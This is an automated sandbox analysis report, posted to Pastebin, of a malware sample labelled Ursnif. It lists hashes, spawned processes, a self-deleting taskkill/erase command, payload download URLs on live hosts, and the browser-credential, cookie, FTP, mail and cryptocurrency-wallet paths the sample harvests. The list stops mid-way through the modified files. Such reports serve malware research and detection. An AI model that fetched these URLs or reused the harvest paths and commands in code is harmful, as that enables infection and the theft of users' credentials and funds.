API tools faq
paste
Advertisement
paladin316

Ursnif_6cc70fb7b014fe253989338d5008381d_exe_2019-07-22_19_30.txt

paladin316
Jul 22nd, 2019
1,298
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.44 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "Ursnif"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Ursnif_6cc70fb7b014fe253989338d5008381d.exe"
  7. * File Size: 664576
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "83502653aa68b492d6382416ecc27a7350be45968211f117ab2a860fb5fe093d"
  10. * MD5: "6cc70fb7b014fe253989338d5008381d"
  11. * SHA1: "eaab87820e5da8b64eb2d2bc2e2bbbac3a43130f"
  12. * SHA512: "e4dbdaaac28eeb15ea6cbd3554090f2883a4a905681269ac72380480d9cc51dc2f079ba7fc37bfe8534d94ffd0629e8bfbcc6c45980ed0300aae9369ad72f01a"
  13. * CRC32: "2349236C"
  14. * SSDEEP: "12288:EGolQnTahriSgWOGi80bfjPpBGxP7+BubZa3BR/mLV09J569buuKa1:EGR+hriSgUi80DOxVa3mLuJ569Cub1"
  15.  
  16. * Process Execution:
  17. "Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  18. "cmd.exe",
  19. "taskkill.exe",
  20. "services.exe",
  21. "svchost.exe",
  22. "WmiPrvSE.exe",
  23. "taskhost.exe",
  24. "sc.exe",
  25. "svchost.exe",
  26. "svchost.exe",
  27. "WerFault.exe",
  28. "wermgr.exe"
  29.  
  30.  
  31. * Executed Commands:
  32. "C:\\ProgramData\\JCXFRDIE2I.exe ",
  33. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe & exit",
  34. "C:\\Windows\\system32\\lsass.exe",
  35. "taskhost.exe $(Arg0)",
  36. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  37. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  38. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  39. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  40. "taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f",
  41. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  42. "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
  43. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\""
  44.  
  45.  
  46. * Signatures Detected:
  47.  
  48. "Description": "At least one process apparently crashed during execution",
  49. "Details":
  50.  
  51.  
  52. "Description": "Creates RWX memory",
  53. "Details":
  54.  
  55.  
  56. "Description": "A process attempted to delay the analysis task.",
  57. "Details":
  58.  
  59. "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  60.  
  61.  
  62.  
  63.  
  64. "Description": "A process created a hidden window",
  65. "Details":
  66.  
  67. "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\ProgramData\\JCXFRDIE2I.exe"
  68.  
  69.  
  70. "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\Windows\\System32\\cmd.exe"
  71.  
  72.  
  73.  
  74.  
  75. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  76. "Details":
  77.  
  78. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  79.  
  80.  
  81. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  82.  
  83.  
  84. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  85.  
  86.  
  87. "suspicious_request": "http://otnet.xyz/141"
  88.  
  89.  
  90. "suspicious_request": "http://otnet.xyz/freebl3.dll"
  91.  
  92.  
  93. "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  94.  
  95.  
  96. "suspicious_request": "http://otnet.xyz/mozglue.dll"
  97.  
  98.  
  99. "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  100.  
  101.  
  102. "suspicious_request": "http://otnet.xyz/nss3.dll"
  103.  
  104.  
  105. "suspicious_request": "http://otnet.xyz/softokn3.dll"
  106.  
  107.  
  108. "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  109.  
  110.  
  111. "suspicious_request": "http://ip-api.com/line/"
  112.  
  113.  
  114. "suspicious_request": "http://otnet.xyz/"
  115.  
  116.  
  117. "suspicious_request": "http://bookyeti.com/img/3001.exe"
  118.  
  119.  
  120.  
  121.  
  122. "Description": "Performs some HTTP requests",
  123. "Details":
  124.  
  125. "url": "http://otnet.xyz/141"
  126.  
  127.  
  128. "url": "http://otnet.xyz/freebl3.dll"
  129.  
  130.  
  131. "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  132.  
  133.  
  134. "url": "http://otnet.xyz/mozglue.dll"
  135.  
  136.  
  137. "url": "http://otnet.xyz/msvcp140.dll"
  138.  
  139.  
  140. "url": "http://otnet.xyz/nss3.dll"
  141.  
  142.  
  143. "url": "http://otnet.xyz/softokn3.dll"
  144.  
  145.  
  146. "url": "http://otnet.xyz/vcruntime140.dll"
  147.  
  148.  
  149. "url": "http://ip-api.com/line/"
  150.  
  151.  
  152. "url": "http://otnet.xyz/"
  153.  
  154.  
  155. "url": "http://bookyeti.com/img/3001.exe"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Deletes its original binary from disk",
  161. "Details":
  162.  
  163.  
  164. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  165. "Details":
  166.  
  167. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13574119 times"
  168.  
  169.  
  170.  
  171.  
  172. "Description": "Attempts to execute a binary from a dead or sinkholed URL",
  173. "Details":
  174.  
  175. "dead_binary": "c:\\programdata\\jcxfrdie2i.exe"
  176.  
  177.  
  178.  
  179.  
  180. "Description": "Steals private information from local Internet browsers",
  181. "Details":
  182.  
  183. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  184.  
  185.  
  186. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt"
  187.  
  188.  
  189. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  190.  
  191.  
  192. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  193.  
  194.  
  195. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt"
  196.  
  197.  
  198. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  199.  
  200.  
  201. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt"
  202.  
  203.  
  204.  
  205.  
  206. "Description": "Collects information about installed applications",
  207. "Details":
  208.  
  209. "Program": "Google Update Helper"
  210.  
  211.  
  212. "Program": "Microsoft Excel MUI 2013"
  213.  
  214.  
  215. "Program": "Microsoft Outlook MUI 2013"
  216.  
  217.  
  218.  
  219.  
  220. "Program": "Google Chrome"
  221.  
  222.  
  223. "Program": "Adobe Flash Player 29 NPAPI"
  224.  
  225.  
  226. "Program": "Adobe Flash Player 29 ActiveX"
  227.  
  228.  
  229. "Program": "Microsoft DCF MUI 2013"
  230.  
  231.  
  232. "Program": "Microsoft Access MUI 2013"
  233.  
  234.  
  235. "Program": "Microsoft Office Proofing Tools 2013 - English"
  236.  
  237.  
  238. "Program": "Adobe Acrobat Reader DC"
  239.  
  240.  
  241. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  242.  
  243.  
  244. "Program": "Microsoft Publisher MUI 2013"
  245.  
  246.  
  247. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  248.  
  249.  
  250. "Program": "Microsoft Office Shared MUI 2013"
  251.  
  252.  
  253. "Program": "Microsoft Office OSM MUI 2013"
  254.  
  255.  
  256. "Program": "Microsoft InfoPath MUI 2013"
  257.  
  258.  
  259. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  260.  
  261.  
  262. "Program": "Microsoft Word MUI 2013"
  263.  
  264.  
  265. "Program": "Microsoft Groove MUI 2013"
  266.  
  267.  
  268.  
  269.  
  270. "Program": "Microsoft Access Setup Metadata MUI 2013"
  271.  
  272.  
  273. "Program": "Microsoft Office OSM UX MUI 2013"
  274.  
  275.  
  276. "Program": "Java Auto Updater"
  277.  
  278.  
  279. "Program": "Microsoft PowerPoint MUI 2013"
  280.  
  281.  
  282. "Program": "Microsoft Office Professional Plus 2013"
  283.  
  284.  
  285. "Program": "Adobe Refresh Manager"
  286.  
  287.  
  288. "Program": "Microsoft Office Proofing 2013"
  289.  
  290.  
  291. "Program": "Microsoft Lync MUI 2013"
  292.  
  293.  
  294.  
  295.  
  296. "Program": "Microsoft OneNote MUI 2013"
  297.  
  298.  
  299.  
  300.  
  301. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  302. "Details":
  303.  
  304.  
  305. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  306. "Details":
  307.  
  308.  
  309. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  310. "Details":
  311.  
  312. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  313.  
  314.  
  315. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  316.  
  317.  
  318. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
  319.  
  320.  
  321. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\*.*"
  322.  
  323.  
  324. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  325.  
  326.  
  327. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\*.*"
  328.  
  329.  
  330. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  331.  
  332.  
  333. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\"
  334.  
  335.  
  336. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  337.  
  338.  
  339. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\*.*"
  340.  
  341.  
  342. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\"
  343.  
  344.  
  345. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  346.  
  347.  
  348. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\"
  349.  
  350.  
  351. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  352.  
  353.  
  354. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\*.*"
  355.  
  356.  
  357. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  358.  
  359.  
  360. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  361.  
  362.  
  363. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\"
  364.  
  365.  
  366. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\*.*"
  367.  
  368.  
  369. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  370.  
  371.  
  372. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\*.*"
  373.  
  374.  
  375. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  376.  
  377.  
  378. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  379.  
  380.  
  381. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\"
  382.  
  383.  
  384. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  385.  
  386.  
  387. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\*.*"
  388.  
  389.  
  390. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  391.  
  392.  
  393. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\"
  394.  
  395.  
  396. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\"
  397.  
  398.  
  399. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  400.  
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  403.  
  404.  
  405. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\*.*"
  406.  
  407.  
  408. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  409.  
  410.  
  411. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\*.*"
  412.  
  413.  
  414. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\"
  415.  
  416.  
  417. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  418.  
  419.  
  420. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  421.  
  422.  
  423. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\"
  424.  
  425.  
  426. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\*.*"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  430.  
  431.  
  432. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\*.*"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  436.  
  437.  
  438. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  439.  
  440.  
  441. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\"
  442.  
  443.  
  444. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\*.*"
  445.  
  446.  
  447. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\"
  448.  
  449.  
  450. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  451.  
  452.  
  453. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  454.  
  455.  
  456. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\*.*"
  457.  
  458.  
  459. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  460.  
  461.  
  462. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  463.  
  464.  
  465. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\"
  466.  
  467.  
  468. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  469.  
  470.  
  471. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\"
  472.  
  473.  
  474. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\*.*"
  475.  
  476.  
  477. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  478.  
  479.  
  480. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  481.  
  482.  
  483. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\"
  484.  
  485.  
  486. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\*.*"
  487.  
  488.  
  489. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  490.  
  491.  
  492. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  493.  
  494.  
  495. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\"
  496.  
  497.  
  498. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\*.*"
  499.  
  500.  
  501. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  502.  
  503.  
  504. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  505.  
  506.  
  507. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  508.  
  509.  
  510. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  511.  
  512.  
  513. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  514.  
  515.  
  516. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\"
  517.  
  518.  
  519. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\*.*"
  520.  
  521.  
  522. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  523.  
  524.  
  525. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\*.*"
  526.  
  527.  
  528. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  529.  
  530.  
  531. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\"
  532.  
  533.  
  534.  
  535.  
  536. "Description": "Harvests credentials from local FTP client softwares",
  537. "Details":
  538.  
  539. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  540.  
  541.  
  542.  
  543.  
  544. "Description": "Harvests information related to installed instant messenger clients",
  545. "Details":
  546.  
  547. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  548.  
  549.  
  550.  
  551.  
  552. "Description": "Harvests information related to installed mail clients",
  553. "Details":
  554.  
  555. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  556.  
  557.  
  558. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  559.  
  560.  
  561. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  562.  
  563.  
  564. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  565.  
  566.  
  567. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  568.  
  569.  
  570. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  571.  
  572.  
  573. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  574.  
  575.  
  576.  
  577.  
  578. "Description": "Collects information to fingerprint the system",
  579. "Details":
  580.  
  581.  
  582. "Description": "Created network traffic indicative of malicious activity",
  583. "Details":
  584.  
  585. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  586.  
  587.  
  588.  
  589.  
  590.  
  591. * Started Service:
  592. "VaultSvc",
  593. "WerSvc",
  594. "W32Time"
  595.  
  596.  
  597. * Mutexes:
  598. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  599. "Local\\WERReportingForProcess2776",
  600. "Global\\\\xe5\\x88\\x90\\xc2\\x90",
  601. "Global\\\\xed\\x95\\xb02",
  602. "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
  603.  
  604.  
  605. * Modified Files:
  606. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  607. "C:\\ProgramData\\freebl3.dll",
  608. "C:\\ProgramData\\mozglue.dll",
  609. "C:\\ProgramData\\msvcp140.dll",
  610. "C:\\ProgramData\\nss3.dll",
  611. "C:\\ProgramData\\softokn3.dll",
  612. "C:\\ProgramData\\vcruntime140.dll",
  613. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\ld",
  614. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\historych",
  615. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  616. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  617. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\c",
  618. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  619. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\wd",
  620. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  621. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  622. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy\\\\xec\\x90\\xa0\\xcd\\xb2\\xe0\\xb8\\xa8\\xc7\\x8b\\xeb\\x86\\x88\\xc7\\xb2\\xe9\\x95\\xb0\\xc8\\x83",
  623. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  624. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  625. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  626. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  627. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  628. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  629. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
  630. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum\\",
  631. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\",
  632. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC\\\r",
  633. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus\\",
  634. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash\\\r",
  635. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge\\",
  636. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash\\",
  637. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore\\",
  638. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\",
  639. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\",
  640. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\",
  641. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\",
  642. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\",
  643. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\",
  644. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\",
  645. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\",
  646. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD\\",
  647. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\",
  648. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin\\",
  649. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\",
  650. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\",
  651. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\",
  652. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\",
  653. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\",
  654. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\",
  655. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\",
  656. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX\\\r",
  657. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  658. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  659. "C:\\ProgramData\\JCXFRDIE2I.exe",
  660. "C:\\ProgramData\\JCXFRDIE2I.exe:Zone.Identifier",
  661. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  662. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  663. "C:\\Windows\\sysnative\\LogFiles\\Scm\\16379d62-d2d1-45c7-a48c-f33b02ea0429",
  664. "\\??\\PIPE\\lsarpc",
  665. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  666. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  667. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  668. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  669. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBC62.tmp.appcompat.txt",
  670. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFBE.tmp.WERInternalMetadata.xml",
  671. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFDE.tmp.hdmp",
  672. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERC713.tmp.mdmp",
  673. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer",
  674. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
